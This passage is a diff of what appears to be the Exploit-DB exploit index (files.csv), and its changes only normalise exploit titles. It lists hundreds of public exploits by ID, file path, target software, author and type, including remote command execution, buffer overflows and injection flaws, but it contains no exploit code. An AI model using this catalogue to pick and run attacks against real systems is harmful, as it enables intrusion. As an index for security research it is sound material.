Society",multiple,remote,0 20660,platforms/unix/remote/20660.txt,"KICQ 1.0 - Remote Arbitrary Command Execution Vulnerability",2001-02-14,"Marc Roessler",unix,remote,0 -20661,platforms/windows/remote/20661.txt,"jarle aase war ftpd 1.67 b04 - Directory Traversal vulnerability",2001-03-06,se00020,windows,remote,0 +20661,platforms/windows/remote/20661.txt,"jarle aase war ftpd 1.67 b04 - Directory Traversal Vulnerability",2001-03-06,se00020,windows,remote,0 20662,platforms/windows/dos/20662.txt,"WhitSoft SlimServe HTTPD 1.1 Get Denial of Service Vulnerability",2001-02-28,joetesta,windows,dos,0 -20663,platforms/windows/remote/20663.txt,"whitsoft slimserve ftpd 1.0/2.0 - Directory Traversal vulnerability",2001-02-28,joetesta,windows,remote,0 +20663,platforms/windows/remote/20663.txt,"whitsoft slimserve ftpd 1.0/2.0 - Directory Traversal Vulnerability",2001-02-28,joetesta,windows,remote,0 20664,platforms/windows/dos/20664.pl,"Microsoft IIS 5.0 WebDAV Denial of Service Vulnerability",2001-03-08,"Georgi Guninski",windows,dos,0 20665,platforms/php/webapps/20665.txt,"T-dah Webmail CSRF & Stored XSS",2012-08-20,"Yakir Wizman",php,webapps,0 -20666,platforms/php/webapps/20666.html,"ClipBucket 2.5 CSRF Vulnerability",2012-08-20,DaOne,php,webapps,0 +20666,platforms/php/webapps/20666.html,"ClipBucket 2.5 - CSRF Vulnerability",2012-08-20,DaOne,php,webapps,0 20667,platforms/hardware/webapps/20667.txt,"Alpha Networks ADSL2/2+ Wireless Router ASL-26555 Password Disclosure",2012-08-20,"Alberto Ortega",hardware,webapps,0 20668,platforms/java/webapps/20668.py,"hupa webmail 0.0.2 - Stored XSS",2012-08-20,"Shai rod",java,webapps,0 -20669,platforms/php/webapps/20669.py,"GWebmail 0.7.3 XSS & LFI RCE Vulnerabilities",2012-08-20,"Shai rod",php,webapps,0 +20669,platforms/php/webapps/20669.py,"GWebmail 0.7.3 - XSS & LFI RCE Vulnerabilities",2012-08-20,"Shai rod",php,webapps,0 20671,platforms/php/webapps/20671.html,"PG Portal Pro CSRF Vulnerability",2012-08-20,Noxious,php,webapps,0 20672,platforms/php/webapps/20672.py,"Hivemail Webmail Multiple Stored XSS Vulnerabilities",2012-08-20,"Shai rod",php,webapps,0 20673,platforms/php/webapps/20673.txt,"YourArcadeScript 2.4 (index.php id parameter) SQL Injection",2012-08-20,DaOne,php,webapps,0 @@ -17961,7 +17961,7 @@ id,file,description,date,author,platform,type,port 20677,platforms/windows/webapps/20677.txt,"IOServer ""Root Directory"" Trailing Backslash Multiple Vulnerabilities",2012-08-20,hinge,windows,webapps,0 20678,platforms/unix/local/20678.c,"Rob Malda ASCDC 0.3 - Buffer Overflow Vulnerability (1)",2001-03-08,anonymous,unix,local,0 20679,platforms/unix/local/20679.c,"Rob Malda ASCDC 0.3 - Buffer Overflow Vulnerability (2)",2001-03-08,"the itch",unix,local,0 -20680,platforms/windows/remote/20680.html,"Microsoft IE 5.0.1/5.5/6.0 Telnet Client File Overwrite Vulnerability",2001-03-09,"Oliver Friedrichs",windows,remote,0 +20680,platforms/windows/remote/20680.html,"Microsoft Internet Explorer 5.0.1/5.5/6.0 Telnet Client File Overwrite Vulnerability",2001-03-09,"Oliver Friedrichs",windows,remote,0 20681,platforms/windows/dos/20681.c,"Baltimore Technologies WEBsweeper 4.0 DoS Vulnerability",2001-01-22,honoriak,windows,dos,0 20682,platforms/windows/remote/20682.txt,"Michael Lamont Savant Web Server 3.0 DoS Vulnerability",2001-03-09,Phiber,windows,remote,0 20683,platforms/cgi/remote/20683.txt,"Ikonboard 2.1.7 b Remote File Disclosure Vulnerability",2001-03-11,"Martin J. Muench",cgi,remote,0 @@ -17990,10 +17990,10 @@ id,file,description,date,author,platform,type,port 20710,platforms/php/webapps/20710.html,"VamCart 0.9 - CSRF Vulnerability",2012-08-22,DaOne,php,webapps,0 20712,platforms/cgi/webapps/20712.rb,"E-Mail Security Virtual Appliance learn-msg.cgi Command Injection",2012-08-22,metasploit,cgi,webapps,0 20713,platforms/php/webapps/20713.rb,"XODA 0.4.5 Arbitrary PHP File Upload Vulnerability",2012-08-22,metasploit,php,webapps,0 -20714,platforms/cgi/remote/20714.txt,"anaconda clipper 3.3 - Directory Traversal vulnerability",2001-03-27,"UkR hacking team",cgi,remote,0 +20714,platforms/cgi/remote/20714.txt,"anaconda clipper 3.3 - Directory Traversal Vulnerability",2001-03-27,"UkR hacking team",cgi,remote,0 20715,platforms/solaris/local/20715.txt,"Junsoft JSparm 4.0 Logging Output File Vulnerability",2001-03-23,KimYongJun,solaris,local,0 -20716,platforms/windows/remote/20716.txt,"apache tomcat 3.0 - Directory Traversal vulnerability",2001-03-28,lovehacker,windows,remote,0 -20717,platforms/windows/remote/20717.txt,"elron im anti-virus 3.0.3 - Directory Traversal vulnerability",2001-03-23,"Erik Tayler",windows,remote,0 +20716,platforms/windows/remote/20716.txt,"apache tomcat 3.0 - Directory Traversal Vulnerability",2001-03-28,lovehacker,windows,remote,0 +20717,platforms/windows/remote/20717.txt,"elron im anti-virus 3.0.3 - Directory Traversal Vulnerability",2001-03-23,"Erik Tayler",windows,remote,0 20718,platforms/unix/local/20718.txt,"MySQL 3.20.32 a/3.23.34 Root Operation Symbolic Link File Overwriting Vulnerability",2001-03-18,lesha,unix,local,0 20719,platforms/multiple/remote/20719.txt,"Tomcat 3.2.1/4.0,Weblogic Server 5.1 URL JSP Request Source Code Disclosure Vulnerability",2001-03-28,"Sverre H. Huseby",multiple,remote,0 20720,platforms/linux/local/20720.c,"Linux kernel <= 2.2.18 - ptrace/execve Race Condition Vulnerability (1)",2001-03-27,"Wojciech Purczynski",linux,local,0 @@ -18001,11 +18001,11 @@ id,file,description,date,author,platform,type,port 20722,platforms/multiple/remote/20722.txt,"Caucho Technology Resin 1.2/1.3 JavaBean Disclosure Vulnerability",2001-04-03,lovehacker,multiple,remote,0 20723,platforms/windows/remote/20723.pl,"Gene6 BPFTP FTP Server 2.0 User Credentials Disclosure Vulnerability",2001-04-03,"Rob Beck",windows,remote,0 20724,platforms/hp-ux/local/20724.txt,"Shareplex 2.1.3 .9/2.2.2 beta Arbitary Local File Disclosure Vulnerability",2001-03-30,"Dixie Flatline",hp-ux,local,0 -20725,platforms/cgi/remote/20725.txt,"Microburst uStorekeeper 1.x Remote Arbitrary Commands Vulnerability",2001-04-02,"UkR hacking team",cgi,remote,0 +20725,platforms/cgi/remote/20725.txt,"Microburst uStorekeeper 1.x - Remote Arbitrary Commands Vulnerability",2001-04-02,"UkR hacking team",cgi,remote,0 20726,platforms/windows/remote/20726.pl,"Gene6 BPFTP Server 2.0 File Existence Disclosure Vulnerability",2001-04-03,"Rob Beck",windows,remote,0 20727,platforms/linux/remote/20727.c,"Ntpd Remote Buffer Overflow Vulnerability",2001-04-04,"babcia padlina ltd",linux,remote,0 20728,platforms/windows/remote/20728.txt,"602Pro Lan Suite 2000a Long HTTP Request Denial of Service Vulnerability",2001-04-05,nitr0s,windows,remote,0 -20729,platforms/php/webapps/20729.txt,"PHP Nuke 1.0/2.5/3.0/4.x Remote Ad Banner URL Change Vulnerability",2001-04-02,"Juan Diego",php,webapps,0 +20729,platforms/php/webapps/20729.txt,"PHP Nuke 1.0/2.5/3.0/4.x - Remote Ad Banner URL Change Vulnerability",2001-04-02,"Juan Diego",php,webapps,0 20730,platforms/unix/remote/20730.c,"IPFilter 3.x Fragment Rule Bypass Vulnerability",2001-04-09,"Thomas Lopatic",unix,remote,0 20731,platforms/bsd/remote/20731.c,"FreeBSD 2.2-4.2,NetBSD 1.2-4.5,OpenBSD 2.x ftpd glob() Buffer Overflow",2001-04-14,"fish stiqz",bsd,remote,0 20732,platforms/freebsd/remote/20732.pl,"freebsd 4.2-stable ftpd glob() Buffer Overflow Vulnerabilities",2001-04-16,"Elias Levy",freebsd,remote,0 @@ -18023,7 +18023,7 @@ id,file,description,date,author,platform,type,port 20744,platforms/cgi/remote/20744.pl,"nph-maillist 3.0/3.5 Arbitrary Code Execution Vulnerability",2001-04-10,Kanedaaa,cgi,remote,0 20745,platforms/solaris/remote/20745.txt,"Solaris 2.6/7.0 IN.FTPD CWD Username Enumeration Vulnerability",2001-04-11,"Johnny Cyberpunk",solaris,remote,0 20746,platforms/palm_os/local/20746.c,"Strip Password Generator 0.3/0.4/0.5 Limited Password-Space Vulnerability",2001-04-10,"Thomas Roessler",palm_os,local,0 -20747,platforms/linux/dos/20747.txt,"Oracle Application Server 4.0.8 .2 ndwfn4.so buffer overflow",2001-04-11,"Fyodor Yarochkin",linux,dos,0 +20747,platforms/linux/dos/20747.txt,"Oracle Application Server 4.0.8 .2 ndwfn4.so Buffer overflow",2001-04-11,"Fyodor Yarochkin",linux,dos,0 20748,platforms/linux/remote/20748.pl,"cfingerd 1.4 Format String Vulnerability (1)",2001-04-11,Lez,linux,remote,0 20749,platforms/linux/remote/20749.c,"cfingerd 1.4 Format String Vulnerability (2)",2001-04-16,VeNoMouS,linux,remote,0 20750,platforms/linux/dos/20750.txt,"Trend Micro Interscan Viruswall (Linux) 3.0.1 - Multiple Program Buffer Overflow",2001-04-13,"eeye security",linux,dos,0 @@ -18046,7 +18046,7 @@ id,file,description,date,author,platform,type,port 20771,platforms/windows/dos/20771.txt,"Simpleserver WWW 1.0.x AUX Directory Denial of Service Vulnerability",2001-04-17,nemesystm,windows,dos,0 20772,platforms/solaris/local/20772.c,"Solaris 2.5/2.6/7.0/8 mailx -F Buffer Overflow Vulnerability (1)",2001-04-01,"Pablo Sor",solaris,local,0 20773,platforms/solaris/local/20773.c,"Solaris 2.5/2.6/7.0/8 mailx -F Buffer Overflow Vulnerability (2)",2001-04-15,"Pablo Sor",solaris,local,0 -20774,platforms/windows/remote/20774.txt,"MS Internet Explorer 5.5 CLSID File Execution Vulnerability",2001-04-17,"Georgi Guninski",windows,remote,0 +20774,platforms/windows/remote/20774.txt,"Microsoft Internet Explorer 5.5 CLSID File Execution Vulnerability",2001-04-17,"Georgi Guninski",windows,remote,0 20775,platforms/windows/remote/20775.txt,"Netscape SmartDownload 1.3 - Buffer Overflow Vulnerability",2001-04-13,"Craig Davison",windows,remote,0 20776,platforms/linux/local/20776.c,"Samba 2.0.x Insecure TMP file Symbolic Link Vulnerability",2001-04-17,"Gabriel Maggiotti",linux,local,0 20777,platforms/linux/local/20777.c,"ISC INN 2.x Command-Line Buffer Overflow Vulnerability (1)",2001-04-18,"Enrique A.",linux,local,0 @@ -18054,9 +18054,9 @@ id,file,description,date,author,platform,type,port 20779,platforms/windows/dos/20779.pl,"Oracle 8 Server 'TNSLSNR80.EXE' DoS Vulnerability",2001-04-18,r0ot@runbox.com,windows,dos,0 20780,platforms/cgi/remote/20780.c,"CrossWind CyberScheduler 2.1 websyncd remote Buffer Overflow Vulnerability",2001-04-17,"Enrique A.",cgi,remote,0 20781,platforms/linux/local/20781.txt,"SUSE 7.0 KFM Insecure TMP File Creation Vulnerability",2001-04-18,"Paul Starzetz",linux,local,0 -20782,platforms/windows/remote/20782.eml,"Microsoft IE 5.0/5.5 and OE 5.5 XML Stylesheets Active Scripting Vulnerability",2001-04-20,"Georgi Guninski",windows,remote,0 +20782,platforms/windows/remote/20782.eml,"Microsoft Internet Explorer 5.0/5.5 and OE 5.5 XML Stylesheets Active Scripting Vulnerability",2001-04-20,"Georgi Guninski",windows,remote,0 20783,platforms/windows/remote/20783.txt,"Rit Research Labs ""The Bat!"" 1.x Missing Linefeeds DoS Vulnerability",2001-04-18,3APA3A,windows,remote,0 -20784,platforms/windows/dos/20784.cpp,"WireShark 1.8.2 & 1.6.0 - Buffer Overflow 0day PoC",2012-08-24,X-h4ck,windows,dos,0 +20784,platforms/windows/dos/20784.cpp,"WireShark 1.8.2 & 1.6.0 - Buffer Overflow PoC (0day)",2012-08-24,X-h4ck,windows,dos,0 20785,platforms/php/webapps/20785.txt,"Ad Manager Pro Multiple Vulnerabilities",2012-08-24,"Yakir Wizman",php,webapps,0 20787,platforms/php/webapps/20787.txt,"Text Exchange Pro (index.php page) Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0 20788,platforms/php/webapps/20788.txt,"AB Banner Exchange (index.php page) Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0 @@ -18074,12 +18074,12 @@ id,file,description,date,author,platform,type,port 20800,platforms/cgi/remote/20800.c,"PowerScripts PlusMail WebConsole 1.0 Poor Authentication Vulnerability (2)",2000-01-11,missnglnk,cgi,remote,0 20801,platforms/cgi/remote/20801.c,"PowerScripts PlusMail WebConsole 1.0 Poor Authentication Vulnerability (3)",2000-01-20,ytcracker,cgi,remote,0 20802,platforms/windows/remote/20802.c,"Microsoft IIS 2.0/3.0 Long URL Denial of Service Vulnerability",1997-06-21,"Andrea Arcangeli",windows,remote,0 -20803,platforms/windows/remote/20803.txt,"raidenftpd 2.1 - Directory Traversal vulnerability",2001-04-25,joetesta,windows,remote,0 -20804,platforms/irix/local/20804.c,"IRIX 5.3/6.x 'netprint' Arbitrary Shared Library Usage Vulnerability",2001-04-26,V9,irix,local,0 +20803,platforms/windows/remote/20803.txt,"raidenftpd 2.1 - Directory Traversal Vulnerability",2001-04-25,joetesta,windows,remote,0 +20804,platforms/irix/local/20804.c,"IRIX 5.3/6.x - 'netprint' Arbitrary Shared Library Usage Vulnerability",2001-04-26,V9,irix,local,0 20805,platforms/irix/remote/20805.c,"SGI IRIX 3/4/5/6,OpenLinux 1.0/1.1 - routed traceon Vulnerability",1998-10-21,Rootshell,irix,remote,0 20806,platforms/hardware/remote/20806.txt,"Tektronix Phaser 740/750/850/930 Network Printer Administration Interface Vulnerability",2001-04-25,Ltlw0lf,hardware,remote,0 -20807,platforms/multiple/remote/20807.txt,"datawizard webxq 2.1.204 - Directory Traversal vulnerability",2001-04-27,joetesta,multiple,remote,0 -20808,platforms/cgi/remote/20808.txt,"PerlCal 2.x Directory Traversal Vulnerability",2001-04-27,ThePike,cgi,remote,0 +20807,platforms/multiple/remote/20807.txt,"datawizard webxq 2.1.204 - Directory Traversal Vulnerability",2001-04-27,joetesta,multiple,remote,0 +20808,platforms/cgi/remote/20808.txt,"PerlCal 2.x - Directory Traversal Vulnerability",2001-04-27,ThePike,cgi,remote,0 20809,platforms/cgi/remote/20809.html,"Excite for Web Servers 1.1 Administrative Password Vulnerability",1998-11-30,"Michael Gerdts",cgi,remote,0 20810,platforms/multiple/remote/20810.c,"FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (1)",1997-11-20,m3lt,multiple,remote,0 20811,platforms/multiple/remote/20811.cpp,"FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (2)",1997-11-20,"Konrad Malewski",multiple,remote,0 @@ -18096,7 +18096,7 @@ id,file,description,date,author,platform,type,port 20822,platforms/linux/local/20822.sh,"Vixie Cron crontab 3.0 Privilege Lowering Failure Vulnerability (1)",2001-05-07,"Sebastian Krahmer",linux,local,0 20823,platforms/linux/local/20823.sh,"Vixie Cron crontab 3.0 Privilege Lowering Failure Vulnerability (2)",2001-07-05,cairnsc,linux,local,0 20824,platforms/hardware/dos/20824.txt,"Cisco Catalyst 2900 12.0 (5.2)XU SNMP Empty UDP Packet Denial of Service",2001-05-03,bashis,hardware,dos,0 -20825,platforms/windows/remote/20825.txt,"michael lamont savant http server 2.1 - Directory Traversal vulnerability",2001-02-17,"Tom Tom",windows,remote,0 +20825,platforms/windows/remote/20825.txt,"michael lamont savant http server 2.1 - Directory Traversal Vulnerability",2001-02-17,"Tom Tom",windows,remote,0 20826,platforms/windows/remote/20826.txt,"Jason Rahaim MP3Mystic 1.0.x Server Directory Traversal Vulnerability",2001-05-07,neme-dhc,windows,remote,0 20827,platforms/multiple/dos/20827.pl,"Hughes Technologies DSL_Vdns 1.0 - Denial of Service Vulnerability",2001-05-07,neme-dhc,multiple,dos,0 20828,platforms/windows/dos/20828.txt,"SpyNet 6.5 Chat Server Multiple Connection Denial of Service Vulnerability",2001-05-07,nemesystm,windows,dos,0 @@ -18106,14 +18106,14 @@ id,file,description,date,author,platform,type,port 20832,platforms/cgi/remote/20832.txt,"Drummond Miles A1Stats 1.0 a1disp3.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0 20833,platforms/cgi/remote/20833.txt,"Drummond Miles A1Stats 1.0 a1disp4.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0 20834,platforms/windows/dos/20834.txt,"ElectroSoft ElectroComm 1.0/2.0 - Denial of Service Vulnerability",2001-05-07,nemesystm,windows,dos,0 -20835,platforms/windows/remote/20835.c,"MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (1)",2001-05-15,"Filip Maertens",windows,remote,0 -20836,platforms/windows/remote/20836.c,"MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (2)",2001-05-16,HuXfLuX,windows,remote,0 -20837,platforms/windows/remote/20837.pl,"MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (3)",2001-05-15,"Cyrus The Gerat",windows,remote,0 -20838,platforms/windows/remote/20838.c,"MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (4)",2001-05-15,MovAX,windows,remote,0 -20839,platforms/windows/remote/20839.sh,"MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (5)",2001-05-15,"Leif Jakob",windows,remote,0 -20840,platforms/windows/remote/20840.txt,"MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (6)",2001-05-15,A.Ramos,windows,remote,0 -20841,platforms/windows/remote/20841.txt,"MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (7)",2001-05-15,"Gary O'Leary-Steele",windows,remote,0 -20842,platforms/windows/remote/20842.txt,"MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (8)",2001-05-15,Roelof,windows,remote,0 +20835,platforms/windows/remote/20835.c,"Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (1)",2001-05-15,"Filip Maertens",windows,remote,0 +20836,platforms/windows/remote/20836.c,"Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (2)",2001-05-16,HuXfLuX,windows,remote,0 +20837,platforms/windows/remote/20837.pl,"Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (3)",2001-05-15,"Cyrus The Gerat",windows,remote,0 +20838,platforms/windows/remote/20838.c,"Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (4)",2001-05-15,MovAX,windows,remote,0 +20839,platforms/windows/remote/20839.sh,"Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (5)",2001-05-15,"Leif Jakob",windows,remote,0 +20840,platforms/windows/remote/20840.txt,"Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (6)",2001-05-15,A.Ramos,windows,remote,0 +20841,platforms/windows/remote/20841.txt,"Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (7)",2001-05-15,"Gary O'Leary-Steele",windows,remote,0 +20842,platforms/windows/remote/20842.txt,"Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (8)",2001-05-15,Roelof,windows,remote,0 20843,platforms/linux/local/20843.txt,"Immunix OS 6.2/7.0,Redhat 5.2/6.2/7.0,S.u.S.E 6.x/7.0/7.1 Man -S Heap Overflow",2001-05-13,"zenith parsec",linux,local,0 20844,platforms/osx/dos/20844.txt,"Apple Personal Web Sharing 1.1/1.5/1.5.5 - Remote DoS Vulnerability",2001-05-10,"Jass Seljamaa",osx,dos,0 20845,platforms/osx/remote/20845.txt,"Maxum Rumpus FTP Server 1.3.2/1.3.4/2.0.3 dev Remote DoS",2001-05-15,"Jass Seljamaa",osx,remote,0 @@ -18127,11 +18127,11 @@ id,file,description,date,author,platform,type,port 20853,platforms/multiple/dos/20853.php,"iPlanet 4.1 Web Publisher Remote Buffer Overflow Vulnerability (2)",2001-05-15,"Gabriel Maggiotti",multiple,dos,0 20854,platforms/windows/dos/20854.txt,"IIS 5.0 WebDav Lock Method Memory Leak DoS Vulnerability",2001-05-17,"Defcom Labs",windows,dos,0 20855,platforms/php/webapps/20855.txt,"Wiki Web Help 0.3.9 - Multiple Stored XSS Vulnerabilities",2012-08-27,"Shai rod",php,webapps,0 -20856,platforms/php/webapps/20856.txt,"XWiki 4.2-milestone-2 Multiple Stored XSS Vulnerabilities",2012-08-27,"Shai rod",php,webapps,0 +20856,platforms/php/webapps/20856.txt,"XWiki 4.2-milestone-2 - Multiple Stored XSS Vulnerabilities",2012-08-27,"Shai rod",php,webapps,0 20857,platforms/php/webapps/20857.txt,"web@all CMS 2.0 - Multiple Vulnerabilities",2012-08-27,LiquidWorm,php,webapps,0 20859,platforms/php/webapps/20859.txt,"vlinks 2.0.3 (site.php id parameter) SQL Injection",2012-08-27,JIKO,php,webapps,0 20861,platforms/win64/local/20861.txt,"Microsoft Windows Kernel Intel x64 SYSRET PoC",2012-08-27,"Shahriyar Jalayeri",win64,local,0 -20862,platforms/php/webapps/20862.txt,"Wordpress Count per Day Plugin 3.2.3 XSS Vulnerability",2012-08-27,Crim3R,php,webapps,0 +20862,platforms/php/webapps/20862.txt,"Wordpress Count per Day Plugin 3.2.3 - XSS Vulnerability",2012-08-27,Crim3R,php,webapps,0 20863,platforms/php/webapps/20863.txt,"xt:Commerce VEYTON 4.0.15 (products_name_de) Script Insertion Vulnerability",2012-08-27,LiquidWorm,php,webapps,0 20864,platforms/asp/webapps/20864.txt,"Elcom CMS 7.4.10 Community Manager Insecure File Upload",2012-08-27,"Sense of Security",asp,webapps,0 20865,platforms/java/remote/20865.rb,"Java 7 Applet Remote Code Execution",2012-08-27,metasploit,java,remote,0 @@ -18146,11 +18146,11 @@ id,file,description,date,author,platform,type,port 20874,platforms/php/webapps/20874.html,"RV Shopping Cart CSRF Vulnerability",2012-08-28,DaOne,php,webapps,0 20876,platforms/windows/remote/20876.pl,"Simple Web Server 2.2-rc2 ASLR Bypass Exploit",2012-08-28,pole,windows,remote,0 20877,platforms/hardware/webapps/20877.txt,"Conceptronic Grab’n’Go and Sitecom Storage Center Password Disclosure",2012-08-28,"Mattijs van Ommeren",hardware,webapps,0 -20878,platforms/cgi/remote/20878.txt,"mimanet source viewer 2.0 - Directory Traversal vulnerability",2001-05-23,joetesta,cgi,remote,0 +20878,platforms/cgi/remote/20878.txt,"mimanet source viewer 2.0 - Directory Traversal Vulnerability",2001-05-23,joetesta,cgi,remote,0 20879,platforms/unix/remote/20879.txt,"OpenServer 5.0.5/5.0.6,HP-UX 10/11,Solaris 2.6/7.0/8 rpc.yppasswdd Buffer Overrun",2001-05-10,metaray,unix,remote,0 20880,platforms/windows/local/20880.c,"Microsoft Windows 2000 - Debug Registers Vulnerability",2001-05-24,"Georgi Guninski",windows,local,0 20881,platforms/multiple/remote/20881.txt,"Beck IPC GmbH IPC@CHIP TelnetD Login Account Brute Force Vulnerability",2001-05-24,"Courtesy Sentry Research Labs",multiple,remote,0 -20882,platforms/multiple/remote/20882.txt,"faust informatics freestyle chat 4.1 sr2 - Directory Traversal vulnerability",2001-05-25,nemesystm,multiple,remote,0 +20882,platforms/multiple/remote/20882.txt,"faust informatics freestyle chat 4.1 sr2 - Directory Traversal Vulnerability",2001-05-25,nemesystm,multiple,remote,0 20883,platforms/windows/dos/20883.txt,"Faust Informatics Freestyle Chat 4.1 SR2 MS-DOS Device Name DoS",2001-05-25,nemesystm,windows,dos,0 20884,platforms/windows/remote/20884.txt,"ACLogic CesarFTP 0.98 b Directory Traversal Vulnerability",2001-05-27,byterage,windows,remote,0 20885,platforms/solaris/local/20885.c,"Solaris 8 mailtool Buffer Overflow Vulnerability",2001-06-01,51,solaris,local,0 @@ -18161,7 +18161,7 @@ id,file,description,date,author,platform,type,port 20890,platforms/multiple/remote/20890.txt,"Aladdin Knowledge Systems eSafe Gateway 3.0 HTML tag Script-filtering Bypass Vulnerability",2001-05-29,"eDvice Security Services",multiple,remote,0 20891,platforms/multiple/remote/20891.txt,"Aladdin Knowledge Systems eSafe Gateway 3.0 Unicode Script-filtering Bypass Vulnerability",2001-05-29,"eDvice Security Services",multiple,remote,0 20892,platforms/hardware/remote/20892.txt,"Olicom XLT-F XL 80 IM V5.5BL2 - Undocumented Community String Vulnerability",2001-03-25,"Jacek Lipkowski",hardware,remote,0 -20893,platforms/windows/remote/20893.txt,"Trend Micro InterScan VirusWall for Windows NT 3.4/3.5/3.51 Remote Reconfiguration Vulnerability",2001-05-24,snsadv,windows,remote,0 +20893,platforms/windows/remote/20893.txt,"Trend Micro InterScan VirusWall for Windows NT 3.4/3.5/3.51 - Remote Reconfiguration Vulnerability",2001-05-24,snsadv,windows,remote,0 20894,platforms/multiple/remote/20894.txt,"Acme.Serve 1.7 - Arbitrary File Access Vulnerability",2001-05-31,"Adnan Rahman",multiple,remote,0 20895,platforms/cgi/remote/20895.txt,"WebTrends Enterprise Reporting Server 3.1 c/3.5 Source Code Disclosure",2001-06-03,"Auriemma Luigi",cgi,remote,0 20896,platforms/windows/remote/20896.txt,"OReilly Software WebBoard 4.10.30 Pager Hostile JavaScript Vulnerability",2001-06-02,"Helmuth Antholzer",windows,remote,0 @@ -18189,16 +18189,16 @@ id,file,description,date,author,platform,type,port 20918,platforms/php/webapps/20918.txt,"Wordpress HD Webplayer 1.1 - SQL Injection Vulnerability",2012-08-29,JoinSe7en,php,webapps,0 20922,platforms/osx/dos/20922.txt,"Rumpus FTP Server 1.3.x/2.0.3 Stack Overflow DoS Vulnerability",2001-06-12,"Jass Seljamaa",osx,dos,0 20923,platforms/unix/local/20923.c,"LPRng 3.6.x Failure To Drop Supplementary Groups Vulnerability",2001-06-07,zen-parse,unix,local,0 -20924,platforms/linux/remote/20924.txt,"MDBMS 0.96/0.99 Query Display Buffer Overflow Vulnerability",2001-06-12,teleh0r,linux,remote,0 +20924,platforms/linux/remote/20924.txt,"MDBms 0.96/0.99 Query Display Buffer Overflow Vulnerability",2001-06-12,teleh0r,linux,remote,0 20925,platforms/java/webapps/20925.txt,"SiteWare 2.5/3.0/3.1 Editor Desktop Directory Traversal Vulnerability",2001-06-13,"Foundstone Labs",java,webapps,0 20926,platforms/linux/local/20926.txt,"Linux 6.1/6.2/7.0/7.1 Man Page Source Buffer Overflow Vulnerability",2001-06-12,zen-parse,linux,local,0 20927,platforms/linux/local/20927.c,"BestCrypt 0.6/0.7/0.8 BCTool UMount Buffer Overflow Vulnerability",2001-06-14,"Carl Livitt",linux,local,0 20928,platforms/linux/local/20928.sh,"Rxvt 2.6.1/2.6.2 - Buffer Overflow Vulnerability",2001-06-15,MasterSecuritY,linux,local,0 20929,platforms/linux/remote/20929.c,"ghttpd 1.4 Daemon Buffer Overflow Vulnerability",2001-06-17,qitest1,linux,remote,0 -20930,platforms/windows/dos/20930.c,"MS Index Server 2.0 and Indexing Service for Win 2000 ISAPI Extension Buffer Overflow (1)",2001-06-18,Ps0,windows,dos,0 -20931,platforms/windows/remote/20931.c,"MS Index Server 2.0 and Indexing Service for Win 2000 ISAPI Extension Buffer Overflow (2)",2001-06-21,hsj,windows,remote,0 -20932,platforms/windows/remote/20932.sh,"MS Index Server 2.0 and Indexing Service for Win 2000 ISAPI Extension Buffer Overflow (3)",2001-06-18,mat,windows,remote,0 -20933,platforms/windows/remote/20933.pl,"MS Index Server 2.0 and Indexing Service for Win 2000 ISAPI Extension Buffer Overflow (4)",2001-06-18,blackangels,windows,remote,0 +20930,platforms/windows/dos/20930.c,"Microsoft Index Server 2.0 and Indexing Service for Win 2000 ISAPI Extension Buffer Overflow (1)",2001-06-18,Ps0,windows,dos,0 +20931,platforms/windows/remote/20931.c,"Microsoft Index Server 2.0 and Indexing Service for Win 2000 ISAPI Extension Buffer Overflow (2)",2001-06-21,hsj,windows,remote,0 +20932,platforms/windows/remote/20932.sh,"Microsoft Index Server 2.0 and Indexing Service for Win 2000 ISAPI Extension Buffer Overflow (3)",2001-06-18,mat,windows,remote,0 +20933,platforms/windows/remote/20933.pl,"Microsoft Index Server 2.0 and Indexing Service for Win 2000 ISAPI Extension Buffer Overflow (4)",2001-06-18,blackangels,windows,remote,0 20934,platforms/windows/remote/20934.txt,"Internet Software Solutions Air Messenger LAN Server 3.4.2 Path Disclosure Vulnerability",2001-06-18,"SNS Research",windows,remote,0 20935,platforms/cgi/remote/20935.pl,"Microburst uDirectory 2.0 - Remote Command Execution Vulnerability",2001-06-18,"Igor Dobrovitski",cgi,remote,0 20936,platforms/linux/remote/20936.c,"NetSQL 1.0 - Remote Buffer Overflow Vulnerability",2001-06-15,"Sergio Monteiro",linux,remote,0 @@ -18210,19 +18210,19 @@ id,file,description,date,author,platform,type,port 20942,platforms/php/webapps/20942.html,"Booking System Pro CSRF Vulnerability",2012-08-30,DaOne,php,webapps,0 20944,platforms/windows/remote/20944.rb,"SAP NetWeaver HostControl Command Injection",2012-08-31,metasploit,windows,remote,0 20945,platforms/solaris/local/20945.txt,"Sun SunVTS 4.x PTExec Buffer Overflow Vulnerability",2001-06-21,"Pablo Sor",solaris,local,0 -20946,platforms/windows/dos/20946.txt,"Cerberus FTP Server 1.x Buffer Overflow DoS Vulnerability",2001-06-21,"Cartel Informatique Security Research Labs",windows,dos,0 +20946,platforms/windows/dos/20946.txt,"Cerberus FTP Server 1.x - Buffer Overflow DoS Vulnerability",2001-06-21,"Cartel Informatique Security Research Labs",windows,dos,0 